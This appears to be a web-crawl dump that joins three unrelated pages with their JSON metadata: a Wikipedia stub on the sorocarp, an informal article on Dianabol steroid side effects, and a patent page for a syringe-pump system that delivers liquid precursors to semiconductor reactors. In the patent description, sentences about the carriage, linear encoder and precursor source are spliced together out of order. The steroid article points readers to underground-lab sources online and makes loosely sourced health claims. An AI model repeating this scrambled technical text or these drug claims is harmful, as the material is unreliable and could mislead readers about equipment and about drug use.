198,
238,
260,
269,
270,
1215,
1216,
1235,
1236,
1248
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 1248,
"ccnet_original_nlines": 15,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.35648149251937866,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.023148149251937866,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.1388888955116272,
"rps_doc_frac_unique_words": 0.6174863576889038,
"rps_doc_mean_word_length": 5.6612019538879395,
"rps_doc_num_sentences": 10,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.496972560882568,
"rps_doc_word_count": 183,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.14671814441680908,
"rps_doc_frac_chars_dupe_6grams": 0.10424710065126419,
"rps_doc_frac_chars_dupe_7grams": 0.10424710065126419,
"rps_doc_frac_chars_dupe_8grams": 0.07335907220840454,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.057915061712265015,
"rps_doc_frac_chars_top_3gram": 0.04054053872823715,
"rps_doc_frac_chars_top_4gram": 0.055019311606884,
"rps_doc_books_importance": -83.0818099975586,
"rps_doc_books_importance_length_correction": -83.0818099975586,
"rps_doc_openwebtext_importance": -29.669065475463867,
"rps_doc_openwebtext_importance_length_correction": -29.669065475463867,
"rps_doc_wikipedia_importance": -24.773221969604492,
"rps_doc_wikipedia_importance_length_correction": -24.773221969604492
},
"fasttext": {
"dclm": 0.049740020185709,
"english": 0.897594153881073,
"fineweb_edu_approx": 2.2416481971740723,
"eai_general_math": 0.2715635299682617,
"eai_open_web_math": 0.3493396043777466,
"eai_web_code": 0.03302646055817604
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "621.317",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": "Mechanical engineering and Machinery"
}
},
"secondary": {
"code": "621.3172",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": "Mechanical engineering and Machinery"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "2",
"label": "Academic/Research"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "3",
"label": "Academic Writing"
},
"secondary": {
"code": "10",
"label": "Knowledge Article"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
8,481,971,003,571,905,000
|
Sorocarp
From Wikipedia, the free encyclopedia
Jump to navigation Jump to search
A sorocarp (from the Greek word soros "a heap" + karpos "fruit") is the fruiting body characteristic of certain cellular slime moulds (e.g., Dictyosteliida). Each sorocarp consists of both a sorophore (stalk) and a sorus.[1][2] Sorocarps release spores.
References[edit]
1. ^ http://www.wordnik.com/words/sorocarp
2. ^ Lawrence, E. 2005. Henderson's Dictionary of Biology, 13th Ed. Prentice Hall, London
|
{
"url": "http://www.let.rug.nl/~gosse/termpedia2/termpedia.php?language=dutch_general&density=7&link_color=000000&termpedia_system=perl_db&url=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FSorocarp",
"source_domain": "www.let.rug.nl",
"snapshot_id": "crawl=CC-MAIN-2019-26",
"warc_metadata": {
"Content-Length": "38748",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:EGNW3BMMLTZL5AV3LGYUC2L44WG57GGU",
"WARC-Concurrent-To": "<urn:uuid:e3f84b08-d1d8-4ad6-8389-8b54ab7addc6>",
"WARC-Date": "2019-06-18T05:50:19Z",
"WARC-IP-Address": "129.125.2.101",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:V3YI4TUBYCRJBA7GMQPV36GGL5VUMQIF",
"WARC-Record-ID": "<urn:uuid:1dd972df-8ba4-4134-8d7f-70ad76a57a75>",
"WARC-Target-URI": "http://www.let.rug.nl/~gosse/termpedia2/termpedia.php?language=dutch_general&density=7&link_color=000000&termpedia_system=perl_db&url=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FSorocarp",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:9ba18edf-c359-4197-9df2-59b1c27cfc39>"
},
"warc_info": "isPartOf: CC-MAIN-2019-26\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for June 2019\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-81-232-163.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
9,
10,
48,
82,
83,
337,
338,
355,
356,
401
],
"line_end_idx": [
9,
10,
48,
82,
83,
337,
338,
355,
356,
401,
492
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 492,
"ccnet_original_nlines": 10,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.1818181872367859,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.01818181946873665,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.3636363744735718,
"rps_doc_frac_unique_words": 0.8153846263885498,
"rps_doc_mean_word_length": 5.769230842590332,
"rps_doc_num_sentences": 13,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 3.872978448867798,
"rps_doc_word_count": 65,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.06400000303983688,
"rps_doc_frac_chars_top_3gram": 0,
"rps_doc_frac_chars_top_4gram": 0,
"rps_doc_books_importance": -44.911224365234375,
"rps_doc_books_importance_length_correction": -53.028602600097656,
"rps_doc_openwebtext_importance": -19.06845474243164,
"rps_doc_openwebtext_importance_length_correction": -27.18583106994629,
"rps_doc_wikipedia_importance": -16.6771297454834,
"rps_doc_wikipedia_importance_length_correction": -24.794506072998047
},
"fasttext": {
"dclm": 0.4561786651611328,
"english": 0.6883284449577332,
"fineweb_edu_approx": 2.8010897636413574,
"eai_general_math": 0.0007474399753846228,
"eai_open_web_math": 0.3601730465888977,
"eai_web_code": -0.000010009999641624745
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "579.9",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Biology and Anthropology",
"level_3": "Biological specimens"
}
},
"secondary": {
"code": "577.1",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Biology and Anthropology",
"level_3": "Life (Biology)"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "1",
"label": "Remember"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "1",
"label": "Factual"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "4",
"label": "Missing Images or Figures"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "3",
"label": "Academic Writing"
}
},
"reasoning_depth": {
"primary": {
"code": "1",
"label": "No Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "1",
"label": "General Audience"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-2,952,724,621,190,698,500
|
Sunday, August 18, 2019
Home > Health & Fitness > A Simple Plan For Researching
A Simple Plan For Researching
Aspects to Enlighten You More about Dianabol Steroids Side Effects
When you are planning to purchase Dianabol steroids you may be pondering about dianabol side effects and how long do they sustain and if they get to have any brain effects and many more. The steroid is no longer available in the market due to the production of them come to an end many years ago. But you can get it from online stores through websites supplying dianabol steroid made from underground labs.
Understand that Dianabol is commonly raised as Dbol and it is an anabolic steroid allied with the male sex hormone. After testosterone the second steroid to be produced in the market was Dianabol. In the 1960s is when the Dbol soared when athletes began using it to enhance their performance. Anabolic steroids provide androgenic effects such as big muscles in males and the growth of skeletal muscles. Steroids are falling under controlled substances that is in some countries lead by US. However, several of them are used as prescription drugs for the treatment of various ailments such as diseases that cause wasting of lean muscles.
Note that Dianabol can cause dangerous cardiovascular risks. Dianabol might also cause you to have high blood pressure. You might get to have a high risk of a heart attack and other heart diseases due to the changes to cholesterol and blood pressure increase. Enlargement of the left ventricle of the heart is also linked to being as a result of steroid abuse. Change of appearance is another side effect you will face if you get to consume Dianabol. Know that getting to abuse Dianabol will end up causing you to have an oily scalp and thinning of the hair and on the other hand, leading to male-pattern hair loss in men and women. In men who abuse Dianabol gets to cause breast growth and atrophy or shrinking o the testicles. Women who get to abuse Dianabol can find themselves developing excess body hair growth, deepening of the voice and enlargement of the clitoris.
Individuals might experience mood alterations. Note that the abuse of the steroids have been linked with numerous effects on emotional and mood states. You will find that an individual is having extreme mood swings such as aggression, rage and mania that are as the cause of using steroids. You might find that one is facing other effects like depression, irritability, nervousness, and delusions. Note that you might suffer from liver damage or liver cancer, get to have a yellowing skin and eyes known as jaundice when you use Dianabol. Reduced sexual activity and sterility might also be as a result of using Dianabol.
|
{
"url": "http://healthgun.us/a-simple-plan-for-researching-2/",
"source_domain": "healthgun.us",
"snapshot_id": "crawl=CC-MAIN-2019-35",
"warc_metadata": {
"Content-Length": "28335",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:HC2R44CWKVZIZM7BLCGVSUBM4LIET73G",
"WARC-Concurrent-To": "<urn:uuid:3a5f76f4-5648-4155-b95b-b42dc19b814d>",
"WARC-Date": "2019-08-18T19:51:13Z",
"WARC-IP-Address": "104.24.98.106",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:EK23QBITF4HRL7NUJI5U4HEQLWZSFY25",
"WARC-Record-ID": "<urn:uuid:773b9ef1-5f46-4a9e-8207-031bbc4114b5>",
"WARC-Target-URI": "http://healthgun.us/a-simple-plan-for-researching-2/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:c4ed8ba1-8358-4a2c-a78f-e4d67addcc08>"
},
"warc_info": "isPartOf: CC-MAIN-2019-35\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for August 2019\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-238.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
24,
80,
81,
111,
112,
179,
586,
587,
1224,
1225,
2098,
2099
],
"line_end_idx": [
24,
80,
81,
111,
112,
179,
586,
587,
1224,
1225,
2098,
2099,
2720
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 2720,
"ccnet_original_nlines": 12,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 3,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.4620000123977661,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.006000000052154064,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.07800000160932541,
"rps_doc_frac_unique_words": 0.4783549904823303,
"rps_doc_mean_word_length": 4.792207717895508,
"rps_doc_num_sentences": 23,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.91221809387207,
"rps_doc_word_count": 462,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.022583559155464172,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.013550139963626862,
"rps_doc_frac_chars_top_3gram": 0.012195119634270668,
"rps_doc_frac_chars_top_4gram": 0.012646789662539959,
"rps_doc_books_importance": -271.38201904296875,
"rps_doc_books_importance_length_correction": -271.38201904296875,
"rps_doc_openwebtext_importance": -140.330322265625,
"rps_doc_openwebtext_importance_length_correction": -140.330322265625,
"rps_doc_wikipedia_importance": -109.55457305908203,
"rps_doc_wikipedia_importance_length_correction": -109.55457305908203
},
"fasttext": {
"dclm": 0.20325368642807007,
"english": 0.9539803266525269,
"fineweb_edu_approx": 1.6982802152633667,
"eai_general_math": 0.07437437772750854,
"eai_open_web_math": 0.17142069339752197,
"eai_web_code": 0.002246619900688529
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "615.1",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Materia medica, Drugs, and Pharmacy"
}
},
"secondary": {
"code": "613.7",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Health and Hygiene"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "1",
"label": "Factual"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "6",
"label": "Promotional/Advertisement"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "17",
"label": "Product Page"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "1",
"label": "No Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "2",
"label": "Partially Correct"
},
"secondary": {
"code": "1",
"label": "Technically Flawed"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-3,047,034,329,290,639,000
|
Search Images Maps Play YouTube News Gmail Drive More »
Sign in
Screen reader users: click this link for accessible mode. Accessible mode has the same essential features but works better with your reader.
Patents
1. Advanced Patent Search
Publication numberUS6640840 B1
Publication typeGrant
Application numberUS 09/667,329
Publication dateNov 4, 2003
Filing dateSep 21, 2000
Priority dateSep 25, 1999
Fee statusLapsed
Also published asDE10046052A1, US20040040505
Publication number09667329, 667329, US 6640840 B1, US 6640840B1, US-B1-6640840, US6640840 B1, US6640840B1
InventorsJohn MacNeil
Original AssigneeTrikon Holdings Limited
Export CitationBiBTeX, EndNote, RefMan
External Links: USPTO, USPTO Assignment, Espacenet
Delivery of liquid precursors to semiconductor processing reactors
US 6640840 B1
Abstract
This invention relates to methods and apparatus for delivering liquid precursors to semi-conductor processing apparatus. The liquid precursor delivery system is generally indicated at (10) and includes a source (11), an inlet tube (12), a two-way valve (13), a pump assembly (14), an outlet tube (15), a shut-off valve (16) and a flash evaporator (17). The pump assembly (14) is in the form of a syringe or variable volume pump and is controlled by a combination of a step motor (27) and a linear encoder (30). The arrangement is such that unused liquid precursor can be returned to the source.
Images(4)
Previous page
Next page
Claims(4)
What is claimed is:
1. Apparatus for delivering a desired volume of liquid precursor, comprising:
a semiconductor processing reactor having an evaporator connected thereto;
a source for the liquid precursor;
a variable volume pump that can deliver various volumes of the precursor from said source to said reactor via said evaporator, said variable volume pump including a pump chamber connected to said source for the precursor and to the evaporator, and a piston that is linearly displaceable to pump a volume of the precursor from said chamber corresponding to the displacement of said piston;
a detector which detects the relative position of said piston;
a motor connected to said piston and operable to drive said piston linearly; and
a control circuit operatively connected to said motor so as to control the operation of said motor and operatively connected to said detector so as to receive signals therefrom indicative of the relative position of said piston, said control circuit operating under feedback from said detector to stop said motor when said piston reaches a given position such that the desired volume of liquid precursor, independent of the volume of said chamber, is expelled from said chamber to said reactor;
wherein said apparatus further comprises an inlet tube leading from said chamber of said variable volume pump towards said source for the precursor, an outlet tube leading from said chamber of said variable volume pump towards said reactor, and a valve operable to selectively place said inlet tube and said outlet tube in open communication with said chamber; and
wherein said control circuit is operatively connected to said valve and to said reactor so as to control said valve to place said chamber of said variable volume pump in open communication with said inlet tube and to operate said motor to drive said piston in a direction that causes said precursor to be induced into said chamber, while said reactor is not processing with precursor from said source.
2. Apparatus for delivering a desired volume of liquid precursor, comprising:
a semiconductor processing reactor having an evaporator connected thereto;
a source for the liquid precursor;
a variable volume pump that can deliver various volumes of the precursor from said source to said reactor via said evaporator, said variable volume pump including a pump chamber connected to said source for the precursor and to the evaporator, and a piston that is linearly displaceable to pump a volume of the precursor from said chamber corresponding to the displacement of said piston;
a detector which detects the relative position of said piston;
a motor connected to said piston and operable to drive said piston linearly; and
a control circuit operatively connected to said motor so as to control the operation of said motor and operatively connected to said detector so as to receive signals therefrom indicative of the relative position of said piston, said control circuit operating under feedback from said detector to stop said motor when said piston reaches a given position such that the desired volume of liquid precursor, independent of the volume of said chamber, is expelled from said chamber to said reactor;
wherein said apparatus further comprises an inlet tube leading from said chamber of said variable volume pump towards said source for the precursor, an outlet tube leading from said chamber of said variable volume pump towards said reactor, and a valve operable to selectively place said inlet tube and said outlet tube in open communication with said chamber; and
wherein said control circuit is operative to control said valve to place said chamber of said variable volume pump in open communication with said outlet and inlet tubes and to operate said motor to drive said piston in a direction that expels precursor from said chamber after said piston has reached said given position in said chamber, whereby said variable volume pump returns undelivered precursor to said source.
3. Apparatus for delivering a desired volume of liquid precursor, comprising:
a semiconductor processing reactor having an evaporator connected thereto;
a source for the liquid precursor;
a variable volume pump that can deliver various volumes of the precursor from said source to the reactor via said evaporator, said pump having a pump chamber;
an inlet tube leading from said pump chamber towards said source for the precursor; an outlet tube leading from said pump chamber towards the reactor;
a valve operable to selectively place said inlet tube and said outlet tube in open communication with said variable volume pump; and
a control circuit operative to control said valve to place said inlet tube in open communication with said variable volume pump and to concurrently operate said motor to drive said pump in a direction that expels precursor from said chamber after said pump has expelled the desired volume of precursor to the reactor via said outlet tube, wherein said variable volume pump returns undelivered precursor to said source via said inlet tube.
4. A method of delivering a liquid precursor to a semiconductor processing reactor, said method comprising:
determining a desired volume of the liquid precursor that is to be delivered to the reactor for carrying out a process therein;
charging a chamber of a variable volume pump, connected to the reactor via an outlet tube, with the liquid precursor from a source of the liquid precursor;
driving a piston of the pump to expel liquid precursor from the chamber and to the reactor via the outlet tube, the displacement of the piston from a starting position corresponding to the volume of liquid precursor expelled;
monitoring the position of the piston relative to the starting position thereof; and
stopping the piston, based on said monitoring, when the relative position of the piston is indicative of the piston having expelled the desired volume of the liquid precursor from the chamber of the pump, whereby the desired volume of liquid precursor delivered to the reactor is independent of the volume of the chamber of the pump;
said method further comprising alternately placing the chamber of the pump in open communication with an inlet tube, connected to a source of the liquid precursor, and then with the outlet tube; and driving the piston of the pump in one direction when the chamber is opened to the inlet tube to induce the liquid precursor into the chamber; wherein the piston of the pump is driven in the other direction when the chamber is placed in open communication with the outlet tube to expel the liquid precursor from the chamber; and
said method further comprising driving the piston of the pump in said another direction when the chamber is placed in open communication with the inlet tube to return to the source an amount of liquid precursor that remains in the chamber after the desired volume of the liquid precursor has been expelled from the chamber, and before the chamber is again charged with the liquid precursor.
Description
This invention relates to methods and apparatus for delivering liquid precursors to semiconductor processing reactors.
There is a good discussion of various prior art proposals for delivering such precursors in the preamble of U.S. Pat. No. 5,620,524 and the reader is referred to this. In general a liquid precursor will be a gas at the low pressures, which typically exist in the reactor (e.g. 1 torr), but at atmospheric pressure (15 torr) they will be in their liquid state. This gives rise to practical delivery and measurement problems, which are exacerbated by the highly reactive nature of many of these precursors, which limit the choice of engineering materials that may be used. Most liquid precursor delivery systems, which are used in wafer processing, are of one of the following three types:
1. There is vaporisation of the liquid and the use of a gas mass flow controller.
2. Use of a liquid mass flow controller.
3. A carrier gas is passed through a liquid in a “bubbler” to vaporise some of the liquid in the carrier gas bubbles.
Whilst gas mass flow measuring instruments are widely used, they present problems when the liquid has to be vaporised for mass flow measurement. A large reservoir of vaporised liquid is required, which increases the residence time of the vaporised liquid at a raised temperature. For peroxide, which is a useful precursor, decomposition may commence before it reaches the process chamber. Liquid mass flow controllers are capable of giving good flow control but are liable to instabilities, believed to be caused by bubbles forming in the mass flow controller whilst in its idle state and the cold liquid cooling the controller can cause calibration drift. Bubblers require a carrier gas and the lower the vapour pressure, the less liquid that is taken up as vapour by the bubbles. Therefore, for low vapour pressure liquids, a high flow of carrier gas is required and that may be incompatible with the process.
As alternatives to these approaches, an arrangement similar to that shown in U.S. Pat. No. 5,620,524 has been tried comprising a positive displacement pump in combination with a narrow bore outlet pipe, but as well as difficulties in selecting appropriate materials for such pumps and other parts, flow variations are experienced due to variations in bore of the narrow bore pipe, necessary to buffer the low pressure chamber from the pump. Such arrangements are susceptible to variations because the flow restriction of the narrow bore pipe dominates as the pump is essentially only a pressurisation device. The results of this method are referred to as “standard” in FIG. 3 below.
A simpler version of this system can be used if a pre-set or fixed flow is acceptable. The system then entirely depends on the action of ambient pressure upon the liquid to replace the use of the pump and the flow restricting tubing to control flow. This system makes use of the fact that clean rooms are pressure controlled environments at slightly above atmospheric pressure. The system is still however dependent on the internal bore diameter of the pipe being accurate and in suitably compatible materials this is not often the case. Specific system calibration can therefore become necessary and different pipe lengths may need to be used depending on the actual bore diameter. The results of this method are referred to as “fixed flow” in FIG. 3 below.
U.S. Pat. No. 5,620,524 describes an alternative using out-of-phase piston pumps, but it relies on the system knowing various characteristics of the precursor and monitoring the temperature and pressure of the precursor in order to deliver a desired mass of precursor.
U.S. Pat. No. 5,098,741 describes the use of a positive displacement pump to feed a liquid precursor to a CVD chamber, but the system requires the use of a pressure metre controlling a variable orifice valve to overcome the problem of dissolved gases.
From one aspect the invention consists in apparatus for delivering a liquid precursor to a semiconductor processing reactor comprising a source of a liquid precursor, a volume calibrated positive displacement pump drawing liquid precursor from the source via an input path and for delivering, along an output path, (preferably without any pressure control and/or pulsing) a known volume of liquid precursor to the reactor. Either just prior to the reactor or within the reactor the liquid precursor may be evaporated, for example by a flash evaporator.
The apparatus may further include a valve for connecting the pump to the input path or the output path. The apparatus may further comprise control means for controlling the pump and the valve whereby the pump draws liquid in, whilst the reactor is not processing with this precursor. Additionally or alternatively the apparatus may further include control means for controlling the pump and the valve whereby the pump returns any undelivered precursor to the source. This recucling, particularly when combined with the pump only being charged when needed, significantly reduces the presence of dissolved gases.
The pump may be in the form of a syringe pump.
The source may include another reservoir of liquid precursor and preferably the source may include at least two bottles or reservoirs and means for automatically connecting one bottle or reservoir to the inlet path as the other becomes empty.
The apparatus preferably includes a linear encoder controlled stepper motor for driving the pump to deliver the known volume.
From another aspect the invention consists in a method of delivering a liquid precursor to a semiconductor processing reactor including:
1. Delivering a liquid precursor, along an input path, into a volume calibrated positive displacement pump from a source of liquid precursor;
2. Delivering, along an output path, preferably without pressure control and/or pulsing a known volume of liquid precursor to the reactor.
The liquid precursor may be evaporated either just before it reaches the reactor or within the reactor.
This may further include permanently connecting the pump to the input path and the output path. Additionally or alternatively, after each volume delivery, the pump may return any remaining liquid to the source, before drawing a fresh charge.
Although the invention has been defined above it is to be understood it includes any inventive combination of the features set out above or in the following description.
The invention may be performed in various ways and specific embodiments will now be described, by way of example, with reference to the accompanying drawing in which:
FIG. 1 is a schematic view of a liquid precursor delivery system;
FIG. 2 is a graph indicating flow rate from the system; and
FIG. 3 is a further graph indicating variations in deposition rates using a variety of liquid precursor delivery systems.
A liquid precursor delivery system is generally indicated at 10 in FIG. 1. The system 10 includes a carriage 29 is revealed very precisely by the linear encoder 30, the position of the piston 26, and hence the volume of liquid displaced, can be very tightly controlled and without relying on the pump being operated over a precisely set time period. Further the whole arrangement enables liquid to be expelled at high pressure.
The pump assembly 14 and valves 13, 16 and 22 are all under the control of a control circuit 31, which is in turn responsive to the linear encoder 30 and the level sensors 21, as well as other processing information from the associated reactor.
In use the stepper motor 27 initially draws the carriage 29 in a downward direction, which moves the piston in a withdrawing sense within the tube 25. With the valve 13 set to connect the pump 24 to the liquid source 11, the liquid precursor can be drawn from one or other of the bottles 18, 19 depending on the position of the valve 22. Once the pump 24 is charged, the stepper motor 27 stops. The valve 13 is then switched to connect the syringe pump 24 to the outlet tube 15 and at the right moment, in processing, the shut off valve 16 is opened and the stepper motor reverses the motion to drive the piston 26 back within the tube 25 causing liquid precursor to be delivered into the flash evaporator 17. The volume of precursor source generally indicated at 11, an inlet tube 12, a two-way valve 13, a pump assembly, generally indicated at 14, an outlet tube 15, a shut off valve 16, and a flash evaporator 17.
The liquid precursor source 11 comprises a pair of bottles 18, 19 contained within a temperature controlled chamber 20, level sensors, schematically indicated at 21 detect the level of liquid in the respective bottles 18, 19. The bottles 18, 19 are connected to a valve 22 and thence to the inlet tube 12. The valve 22 is arranged to connect one or other of the bottles 18, 19 to the tube 12.
The pump assembly 14 is of the type generally known as a syringe or variable volume pump, such as, for example, made by Lee Products in their LPV series. Such pumps have a syringe 24 comprising a tube 25 and a piston 26. The piston is linked to a stepper motor 27 and in general means are provided for detecting the linear movement of the piston to determine the volume of liquid expelled from the syringe.
In the illustrated arrangement the stepper motor 27 drives a lead screw 28 which in turn linearly moves a carriage 29 that is connected to the free end of the piston 26. The linear position of the carriage 29 is detected by a linear encoder 30. As the position of the liquid expelled is directly related to the travel of the piston 26 and hence of the carriage 29. This can be monitored by the control circuit 31 via the linear encoder 30 and as soon as the desired volume is achieved, the stepper motor 27 is turned off. Thus it will be seen that very precise volumes of liquid precursor can be delivered at high pressure into the evaporator without the problems which arise with other systems.
It is preferred that the syringe is filled with more than the required volume to prevent any shortage in delivery. Conveniently, then the unexpelled liquid can be returned to the bottles 18, 19 via a valve 13, tube 12 and valve 23 so that the liquid precursor can be kept in the best conditions possible.
The provision of two bottles enables one bottle to be switched over when it becomes empty, without any interruption in processing being necessary.
It is thus anticipated that wafers or batches of wafers can be introduced into the reactor chamber, a precise volume of liquid precursor delivered into the chamber via the flash evaporator 17 and thereafter the pump can be emptied and recharged ready for the next wafer or batch.
FIG. 2 illustrates the linearity in flow rate that can be achieved with the system of the invention and hence the accuracy of volume delivery.
FIG. 3 illustrates the resultant benefits in terms of repeatability deposition rate. It will be seen that the syringe produces a very repeatable level of deposition using a hydrogen peroxide system as compared with earlier delivery proposals.
The system has a number of advantages:
1. It can be self primed at the beginning of a run and hence clear any lines of degraded hydrogen peroxide and bubbles from the line and syringe.
2. The syringe need only be filled immediately prior to the process avoiding degradation of the liquid precursor.
3. The delivery rate can be fully programmable.
4. The delivery rate can be fully monitored by the linear encoder.
5. Any excess liquid precursor is returned to the source at the end of the process.
6. Continuous running through the automatic bottle changeover can be easily achieved. These benefits have been particularly noted with such precursors as hydrogen peroxide which do tend to degrade when not kept under suitable conditions. The delivery system also works very well with hydrogen peroxide being accurate to below 1 gram per minute. Flow rates can be easily changed without any significant loss of accuracy simply by changing the pump tubes and the matching pistons.
Experiments, which are reported, in our copending UK Patent application 0001179.1 entitled “Method and Apparatus for forming a film on a substrate” using conventional systems and then a syringe pump to deliver cyclohexyldimethoxymethylsilane show that for at least some precursors and processes acceptable results are only obtained when a syringe pump assembly as described is used. This disclosure is incorporated herein by reference.
Patent Citations
Cited PatentFiling datePublication dateApplicantTitle
US3223040Apr 9, 1962Dec 14, 1965Stewart Warner CorpTwo component pumping and proportioning system
US4793524Apr 30, 1981Dec 27, 1988American Monitor CorporationIntegrated reagent container and metered dispenser means
